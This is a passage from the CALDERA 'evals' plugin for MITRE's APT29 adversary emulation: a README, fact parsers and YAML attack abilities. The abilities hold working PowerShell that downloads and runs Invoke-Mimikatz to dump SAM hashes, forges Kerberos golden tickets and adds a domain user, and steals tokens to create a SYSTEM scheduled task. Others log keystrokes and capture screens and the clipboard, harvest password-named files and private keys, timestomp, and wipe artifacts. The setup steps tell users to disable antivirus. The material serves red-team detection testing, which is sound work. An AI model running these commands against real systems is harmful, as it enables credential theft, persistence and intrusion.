CONDITIONS -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/README.md: -------------------------------------------------------------------------------- 1 | # CALDERA plugin: evals 2 | 3 | ## Overview 4 | 5 | This repository contains the evals plugin for [CALDERA](https://github.com/mitre/caldera/wiki). 6 | This [plugin](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-a-plugin) contains the TTPs used within the ATT&CK Evaluations round 2 (APT29) and round 1 (APT3). 7 | For more information, please see the [evaulations website](https://attackevals.mitre-engenuity.org/about). 8 | 9 | **Please read this README.md in its entirety to avoid missing crucial steps when executing an adversary.** 10 | 11 | ## Initial CALDERA Installation 12 | 1. Clone CALDERA 2.6.6 13 | ``` 14 | git clone https://github.com/mitre/caldera.git --recursive --branch 2.6.6 && cd caldera && sudo ./install.sh 15 | ``` 16 | 17 | 2. Clone the Eval plugin into the caldera/plugins directory 18 | ```commandline 19 | git clone https://github.com/mitre-attack/attack-arsenal.git && cp -R attack-arsenal/adversary_emulation/APT29/CALDERA_DIY/evals caldera/plugins/ && cd caldera 20 | ``` 21 | 22 | 3. Add the eval plugin to CALDERA config `conf/local.yml` 23 | ```yaml 24 | plugins: 25 | - evals 26 | ``` 27 | 28 | ## Round 2 Adversary 29 | The APT29 adversary is broken up into three separate CALDERA [adversaries](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-an-adversary) that execute commands in different phases. 30 | Under the operation panel you will see these phases listed as **APT29 - Day 1.A**, **APT29 - Day 1.B**, and **APT29 - Day 2**. 31 | Leverage the appropriate CALDERA [SANDCAT](https://caldera.readthedocs.io/en/latest/Plugin-library.html?highlight=sandcat#sandcat-54ndc47) [groups](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-a-group) for each operational phase. 32 | Prior to running an [operation](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-an-operation), please consult the environment setup steps below. 33 | 34 | ### Environment Setup - Evals Round 2 - APT29 35 | Consult the [ATT&CK EVALUATION's Environment](https://attackevals.mitre-engenuity.org/APT3/environment) web page for a reference guide on how to replicate the range environment. 36 | Ensure that all A/V is disabled within the environment to successfully replicate the EVALS environment. 37 | 38 | - On your day 2 initial host you will need to manually browse to ```C:\Windows\Temp``` via ```Windows Explorer``` and accept the prompt. 39 | 40 | Requirements for the round 2 adversary are the following: 41 | - Initial host exists within a Windows domain. 42 | - Install Google Chrome on the target. 43 | 44 | - OneDrive account for data exfil. 45 | - *Failing to setup a OneDrive account will result only in an exfiltration ability failing, but the entire plugin can still run.* 46 |
47 | 48 | - Disabling A/V products on host. 49 | - *Failing to disable A/V products on the host will likely resolve in payloads being removed before abilities are executed.* 50 | 51 | **It is recommended that you first execute the evals plugin in an isolated-test environment to fully understand the TTPs performed on hosts, as well as the artifacts left behind.** 52 | 53 | #### Setting Up CALDERA Facts 54 | Next, update the [CALDERA facts](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-a-fact) now located in ```/caldera/plugins/evals/data/sources/4fb34bde-b06d-445a-a146-8e35f79ce546.yml``` 55 | with the appropriate values for your environment. Keys to update include: 56 | 57 | * Update ```target.domain.name``` to your environment's domain name. 58 | * Update ```target.winrm.username``` to an administrator account you will later laterally move to. 59 | * Update ```target.winrm.password``` to the administrators password used by ```target.winrm.username``` (**THIS WILL BE STORED IN PLAINTEXT**). 60 | * Update ```target.winrm.remote_host``` to the remote host with winrm enabled for lateral movement. 61 | * Update ```pivot_machine_hostname``` to the hostname of a Windows host for lateral movement via psexec. 62 | * Update ```profile_user``` as the initial user the first SANDCAT agent will be spawning under. 63 | * Update ```profile_user_password```to the ```profiler_user```'s password (**THIS WILL BE STORED IN PLAINTEXT**). 64 | * Update ```profile_user_day2``` to another user within the domain. 65 | * Update ```profile_user_password_day2``` to ```profile_user_day2```'s password (**THIS WILL BE STORED IN PLAINTEXT**). 66 | * Update ```onedrive.url``` to a OneDrive url. 67 | * Update ```onedrive.username``` to a OneDrive account that will be used for data exifiltration. 68 | * Update ```onedrive.password``` to the ```onedrive.username```'s password (**THIS WILL BE STORED IN PLAINTEXT**). 69 | 70 | 71 | #### Setting Up the CALDERA Server 72 | After initially cloning the CALDERA server, modify the ```conf/default.yml``` and set the CALDERA server's IP and port. 73 | 74 | * ```vim ./conf/default.yml``` 75 | 76 | *Note, this is a relative path from the plugin's location.* 77 | 78 | #### Setting Up Payloads 79 | Prior to executing any of the commands listed below, certain payloads must be configured with your CALDERA server's IP address and port. 80 | To accomplish this, use the ```setup.py```. Python script located in the payloads directory of the evals’ plugin to dynamically 81 | update the payloads to the appropriate IP and port. 82 | 83 | * ```cd plugins/evals/ && python3 ./payloads/setup.py``` 84 | 85 | 86 | ### Starting CALDERA 87 | Activate the Python virtual environment created by `install.sh`. 88 | 89 | * ```cd ../../ && source ./calderaenv/bin/activate``` 90 | 91 | Start a fresh instance of CALDERA. 92 | 93 | * ```python3 server.py --fresh``` 94 | 95 | ### EVALs Round 2 - APT 29 Operation Steps 96 | The APT29 [adversary profile](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-an-adversary) is broken down into three separate adversary profiles. 97 | These profiles include **APT29 Day-1 A**, **APT29 Day-1 B - Lateral Movement**, and **APT29 Day-2**. 98 | To successfully replicate the ATT&CK evals process, an environment setup like the one outlined in the environment setup section is assumed. 99 | 100 | #### APT29 Day 1.A 101 | Perform the following steps to get started with the APT29 adversary profiles: 102 | 103 | 1. Start a SANDACAT agent with elevated privileges. To do so, copy the SANDCAT cradle from the agent’s tab 104 | and execute in an elevated user’s PowerShell prompt. 105 | 106 | ![img-0](./imgs/0-caldera.png) 107 | 108 | ![img-1](./imgs/1-caldera.png) 109 | 110 | ![img-2](./imgs/2-caldera.png) 111 | 112 | ![img-3](./imgs/3-caldera.png) 113 | 114 | Before hitting "enter" within the PowerShell prompt, you should change the default group from **"red"** to something more descriptive 115 | such as **"red-day-1-A"**. See the image below. 116 | 117 | ![img-4](./imgs/4-caldera.png) 118 | 119 | At this point, you should then see an agent call back to your CALDERA server, which is visible under the "**agents**" tab. 120 | ![img-5](./imgs/5-caldera.png) 121 | 122 | ![img-6](./imgs/6-caldera.png) 123 | 124 | 2. Now that we have an agent, we can run an operation. Select "**APT29 Day-1 A**" from the operation page. 125 | ![img-7](./imgs/7-caldera.png) 126 | 127 | ![img-8](./imgs/8-caldera.png) 128 | 129 | 3. Start the APT29 Day-1 operation. 130 | 131 | --- 132 | 133 | #### APT29 Day 1.B - Lateral Movement 134 | Additional agents will spawn from the **APT29 Day-1 A** operation including a SANDCAT agent renamed as "python.exe". 135 | This will be the starting for **APT29 Day-1 B**. To start **APT29 Day-1 B**, start another operation with the group the "python.exe" agent is in. 136 | Agent metadata can be viewed by clicking on the process id within the CALDERA interface. 137 | 138 | ![img-10](./imgs/10-caldera.png) 139 | 140 | ![img-11](./imgs/11-caldera.png) 141 | 142 | Now that we have verified the new agent exists, run a new operation using the **APT29 1.B - Lateral Movement** adversary profile. 143 | 144 | --- 145 | 146 | #### APT29 Day 2 147 | The APT29 Day-2 adversary profile expects a new agent to be run on a new machine as a non-elevated user. 148 | Copy the SANDCAT cradle as previously done and execute in a non-administrator PowerShell prompt. 149 | 150 | ![img-12](./imgs/12-caldera.png) 151 | 152 | After completing all adversary steps outlined above, RDPing into the target host should trigger additional persistence mechanisms. 153 | 154 | ## Issues? 155 | Please consult the [common problems](https://caldera.readthedocs.io/en/latest/Common-problems.html) page on the CALDERA Read the Docs page. 156 | If you're still having issues, please open a git issue on the evals plugin page and follow the guidelines within ISSUES.md for reporting issues. 157 | 158 | ## Acknowledgements 159 | * [Microsoft Sysinternals](https://docs.microsoft.com/en-us/sysinternals/) 160 | * [Mimikatz](https://github.com/gentilkiwi/mimikatz) 161 | * [PoshC2](https://github.com/nettitude/PoshC2) 162 | * [PowerShell Empire](https://github.com/EmpireProject/Empire) 163 | * [PowerShell Mafia](https://github.com/PowerShellMafia) 164 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/app/gui_api.py: -------------------------------------------------------------------------------- 1 | from aiohttp_jinja2 import template 2 | 3 | from app.service.auth_svc import check_authorization 4 | from app.utility.base_world import BaseWorld 5 | 6 | class GuiApi(BaseWorld): 7 | 8 | def __init__(self, services): 9 | self.auth_svc = services.get('auth_svc') 10 | 11 | @check_authorization 12 | @template('evals.html') 13 | async def splash(self, request): 14 | return dict() 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/app/parsers/ntlm.py: -------------------------------------------------------------------------------- 1 | from app.objects.secondclass.c_relationship import Relationship 2 | from app.utility.base_parser import BaseParser 3 | import re 4 | 5 | 6 | class Parser(BaseParser): 7 | 8 | def __init__(self, parser_info): 9 | super().__init__(parser_info) 10 | self.mappers = parser_info['mappers'] 11 | self.used_facts = parser_info['used_facts'] 12 | 13 | def ntlm_parser(self, text): 14 | if text and len(text) > 0: 15 | value = re.search(r'\w{32}', text) 16 | if value: 17 | return [value.group(0)] 18 | 19 | def parse(self, blob): 20 | relationships = [] 21 | try: 22 | parse_data = self.ntlm_parser(blob) 23 | for match in parse_data: 24 | for mp in self.mappers: 25 | relationships.append( 26 | Relationship(source=(mp.source, match), 27 | edge=mp.edge, 28 | target=(mp.target, None) 29 | ) 30 | ) 31 | except Exception: 32 | pass 33 | return relationships 34 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/app/parsers/sessionid.py: -------------------------------------------------------------------------------- 1 | from app.objects.secondclass.c_relationship import Relationship 2 | from app.utility.base_parser import BaseParser 3 | import re 4 | 5 | 6 | class Parser(BaseParser): 7 | 8 | def __init__(self, parser_info): 9 | super().__init__(parser_info) 10 | self.mappers = parser_info['mappers'] 11 | self.used_facts = parser_info['used_facts'] 12 | 13 | def sessionid_parser(self, text): 14 | if text and len(text) > 0: 15 | value = re.search(r'\s\d', text) 16 | if value: 17 | return [value.group(0)] 18 | else: 19 | print("[!!!] Session id parser not found") 20 | 21 | def parse(self, blob): 22 | relationships = [] 23 | try: 24 | parse_data = self.sessionid_parser(blob) 25 | for match in parse_data: 26 | for mp in self.mappers: 27 | relationships.append( 28 | Relationship(source=(mp.source, match), 29 | edge=mp.edge, 30 | target=(mp.target, None) 31 | ) 32 | ) 33 | except Exception: 34 | pass 35 | return relationships 36 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/app/parsers/sid.py: -------------------------------------------------------------------------------- 1 | from app.objects.secondclass.c_relationship import Relationship 2 | from app.utility.base_parser import BaseParser 3 | import re 4 | 5 | 6 | class Parser(BaseParser): 7 | 8 | def __init__(self, parser_info): 9 | super().__init__(parser_info) 10 | self.mappers = parser_info['mappers'] 11 | self.used_facts = parser_info['used_facts'] 12 | 13 | def sid_parser(self, text): 14 | if text and len(text) > 0: 15 | value = re.search(r'S-(\d-?){1,34}', text) 16 | if value: 17 | return [value.group(0)[:-1]] 18 | else: 19 | print("[!] Error parsing SID") 20 | 21 | def parse(self, blob): 22 | relationships = [] 23 | try: 24 | parse_data = self.sid_parser(blob) 25 | for match in parse_data: 26 | for mp in self.mappers: 27 | relationships.append( 28 | Relationship(source=(mp.source, match), 29 | edge=mp.edge, 30 | target=(mp.target, None) 31 | ) 32 | ) 33 | except Exception: 34 | import pdb; pdb.set_trace() 35 | pass 36 | return relationships 37 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/0b1841bd-ef8b-475c-bce7-8fcb2860984a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a 4 | name: 8.D.1 - Screen Capture (T1113) 5 | description: Native API call(s) were used to collect a screenshot. 6 | tactic: collection 7 | technique: 8 | attack_id: T1113 9 | name: Screen Capture 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Import-Module .\Get-Screenshot.ps1 -Verbose -Force; 15 | Get-Screenshot; 16 | payload: Get-Screenshot.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/5692da31-3586-4e4f-8f07-5750070c730b.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 5692da31-3586-4e4f-8f07-5750070c730b 3 | name: 2.A - Automated Collection (T1119) 4 | description: Execute PowerShell from cmd.exe to collect and compress files of specific extensions. 5 | tactic: collection 6 | technique: 7 | attack_id: T1119 8 | name: Automated Collection 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/a4b14c10-49aa-4ae4-b165-d5a37364fe62.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: a4b14c10-49aa-4ae4-b165-d5a37364fe62 3 | name: 7.A.0 - Staging files for PowerShell module imports 4 | description: Renaming psversion.txt to psversion.txt to be imported 5 | tactic: collection 6 | technique: 7 | attack_id: T1036 8 | name: Masquerading 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | 14 | if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { 15 | write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | 19 | Set-Location -path "C:\Program Files\SysInternalsSuite"; 20 | if (test-path -path ".\psversion.txt" ) { 21 | move-item .\psversion.txt psversion.ps1 -Force; 22 | } 23 | write-host "[+] File psversion.ps1 staged to be imported." 24 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/a81ea4ad-bc9f-49a7-82d4-4466df641487.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: a81ea4ad-bc9f-49a7-82d4-4466df641487 4 | name: 7.A.1 - Screen Capturing 5 | description: Load custom PowerShell module and take screenshots. 6 | tactic: collection 7 | technique: 8 | attack_id: T1113 9 | name: Screen Capture 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { 15 | write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | 19 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 20 | . .\psversion.ps1; 21 | Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; 22 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c 4 | name: 17.A - Collect E-mails 5 | description: Perform e-mail collection from custom PowerShell module. 6 | tactic: collection 7 | technique: 8 | attack_id: T1114 9 | name: Email Collection 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepSeventeen_email.ps1; 15 | Write-Host "Emails Collected"; 16 | payload: stepSeventeen_email.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/db28f68d-e8b8-46e6-b680-642570d4b257.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: db28f68d-e8b8-46e6-b680-642570d4b257 3 | name: 7.A.3 - Automated Collection (T1119) - Input Capture (T1417) 4 | description: Load custom PowerShell module, and grab keystrokes for 15 seconds. 5 | tactic: collection 6 | technique: 7 | attack_id: T1417 8 | name: Input Capture 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { 14 | write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; 15 | exit 1; 16 | } 17 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 18 | . .\psversion.ps1; 19 | Get-Keystrokes; 20 | Start-Sleep -Seconds 15; 21 | View-Job -JobName "Keystrokes"; 22 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/ee4c2eab-be57-434c-a32c-14b77360301a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: ee4c2eab-be57-434c-a32c-14b77360301a 3 | name: 7.A.2 - Automated Collection (T1119) - Clipboard (T1115) 4 | description: Get contents of clipboard 5 | tactic: collection 6 | technique: 7 | attack_id: T1115 8 | name: Clipboard Data 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | $clip_data=get-clipboard; 14 | if ($clip_data.Length -gt 0) { 15 | write-host "[+] Clipboard data obtained!\n"; 16 | write-host $clip_data; 17 | } else { 18 | write-host "[!] No clipboard data available!\n"; 19 | } 20 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/fc231955-774f-442c-ac0e-e74dfda50c5c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: fc231955-774f-442c-ac0e-e74dfda50c5c 4 | name: 17.B/C - Collect Files & Compress Collection 5 | description: Collect a specific document from a target machine. 6 | tactic: collection 7 | technique: 8 | attack_id: T1005 9 | name: Data from Local System 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | 15 | try{ 16 | if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { 17 | New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; 18 | } 19 | } catch { 20 | write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; 21 | exit 1; 22 | } 23 | 24 | if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { 25 | write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; 26 | exit 1; 27 | } 28 | Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; 29 | . .\stepSeventeen_zip.ps1; 30 | zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; 31 | if ($?) { 32 | write-host "[+] Documents successfully staged for collection."; 33 | } 34 | 35 | payload: stepSeventeen_zip.ps1 36 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24 3 | name: 14.C - Stage Mimikatz Binary 4 | description: Staging Mimikatz Binary for later execution 5 | tactic: credential-access 6 | technique: 7 | attack_id: T1003 8 | name: Credential Dumping 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | write-host "[+] Successfully downloaded m.exe"; 14 | payload: m.exe 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/267bad86-3f06-49f1-9a3e-6522f2a61e7a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 267bad86-3f06-49f1-9a3e-6522f2a61e7a 3 | name: 20.A.1 - Execute Invoke-Mimikatz 4 | description: Perfofrm Mimikatz credential collection 5 | tactic: credential-access 6 | technique: 7 | attack_id: T1003 8 | name: Credential Dumping 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | klist purge; 14 | . .\Invoke-Mimikatz.ps1; 15 | invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; 16 | klist; 17 | invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; 18 | payload: Invoke-Mimikatz.ps1 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 4ef6009d-2d62-4bb4-8de9-0458df2e9567 4 | name: 14.B - Credential Dumping (T1003) 5 | description: Dumping credentials via wmidump (Mimikatz) 6 | tactic: credential-access 7 | technique: 8 | attack_id: T1003 9 | name: Credential Dumping 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepFourteen_credDump.ps1; 15 | payload: stepFourteen_credDump.ps1 16 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/c4f4b13c-87b6-498c-b814-93570173068c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: c4f4b13c-87b6-498c-b814-93570173068c 3 | name: 6.B.1 - Credentials In Files (T1081) - Private Keys Extraction 4 | description: Obtain credentials via Custom PowerShell 5 | tactic: credential-access 6 | technique: 7 | attack_id: T1145 8 | name: Private Keys 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; 14 | 15 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { 16 | write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; 17 | exit 1; 18 | } 19 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 20 | . .\readme.ps1; 21 | Get-PrivateKeys; 22 | if ($? -eq $True) { 23 | write-host "[+] Successfully executed private key collection script."; 24 | exit 0; 25 | } else { 26 | write-host "[!] Error, could not execution Get-PrivateKeys."; 27 | exit 1; 28 | } 29 | payload: dmevals.local.pfx -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d 3 | name: 6.A - Credentials In Files (T1081) - Chrome 4 | description: Obtain credentials from Chrome Dumper 5 | tactic: credential-access 6 | technique: 7 | attack_id: T1003 8 | name: Credential Dumping 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { 14 | write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; 15 | exit 1; 16 | } 17 | 18 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 19 | ./accesschk.exe -accepteula .; 20 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: effbedc1-1bc8-4a75-9395-980559700008 4 | name: 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) 5 | description: Mimikatz lsadump::sam is executed via Invoke-Mimikatz to dump hashes via process injection into LSASS. 6 | tactic: credential-access 7 | technique: 8 | attack_id: T1003 9 | name: Credential Dumping 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }; 15 | $web = (New-Object System.Net.WebClient); 16 | $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); 17 | iex $result; 18 | function hashdump 19 | { 20 | Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit" 21 | }; 22 | hashdump; 23 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/03afada1-1714-408f-bde5-f528b91dc89d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 03afada1-1714-408f-bde5-f528b91dc89d 4 | name: >- 5 | 5.B.1 - Access Token Manipulation (T1134), 6 | 6.A.1 - Query Registry (T1012), 7 | 7.B.1 - Remote File Copy (T1105), 8 | 7.C.1 - Scheduled Tasks (T1053), 9 | 8.A.1/2 - File and Directory Discovery (T1083) 10 | description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. 11 | tactic: defensive-evasion 12 | technique: 13 | attack_id: T1134 14 | name: Access Token Manipulation (T1134) 15 | platforms: 16 | windows: 17 | psh,pwsh: 18 | command: | 19 | Import-Module .\StealToken.ps1 -Verbose -Force; 20 | StealToken; 21 | CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; 22 | CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; 23 | CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; 24 | CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; 25 | RevertToSelf; 26 | payload: StealToken.ps1,sandcat.go-windows 27 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/208b021b-c79a-4176-8ad1-3af99ed50c6f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 208b021b-c79a-4176-8ad1-3af99ed50c6f 3 | name: 9.C - Artifact Cleanup - Delete Staged Files 4 | description: Cleanup files related to Operation 5 | tactic: defensive-evasion 6 | technique: 7 | attack_id: T1107 8 | name: File Deletion 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | 14 | 15 | if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) { 16 | mkdir "C:\Program Files\SysInternalsSuite"; 17 | } 18 | set-location "C:\Program Files\SysInternalsSuite"; 19 | 20 | if (!$(test-path -path "sdelete64.exe")) { 21 | iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip; 22 | Expand-Archive sdelete64.zip -force; 23 | } 24 | copy sdelete64.exe C:\Windows\Temp\; 25 | cd C:\Windows\Temp\ ; 26 | .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe; 27 | .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip; 28 | .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip; 29 | remove-item C:\Windows\Temp\sdelete64.exe -force; 30 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278 4 | name: 12.A Timestomp kxwn.lock 5 | description: Timestomp kxwn.lock 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1099 9 | name: Timestomp 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { 15 | write-host "[!] kxwn.lock was not found on this host."; 16 | exit 1; 17 | } else { 18 | . .\timestomp.ps1; 19 | timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; 20 | } 21 | payload: timestomp.ps1 22 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92 3 | name: 10.A.3 - Artifact Cleanup 4 | description: Delete file artifacts left from the operation. 5 | tactic: defensive-evasion 6 | technique: 7 | attack_id: T1107 8 | name: File Deletion 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; 14 | Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; 15 | Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; 16 | if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { 17 | Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; 18 | } else { 19 | write-host "[!] File did not exist to be removed!"; 20 | } 21 | 22 | if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { 23 | Remove-Job -Name "Keystrokes"; 24 | if ($?) { 25 | write-host "[+] Job \"Keystrokes\" was remove."; 26 | } 27 | } else { 28 | write-host "[!] Job \"Keystrokes\" did not exist."; 29 | } 30 | 31 | if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { 32 | Remove-Job -Name "Screenshot" -Force; 33 | write-host "[+] Job \"screenshot\" was removed."; 34 | } else { 35 | write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; 36 | } 37 | remove-item upload.ps1 -Force; 38 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/5226e5dc-fc28-43b7-a679-0db49d520402.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5226e5dc-fc28-43b7-a679-0db49d520402 4 | name: 14.A - UAC Bypass via sdctl 5 | description: Invoke UAC 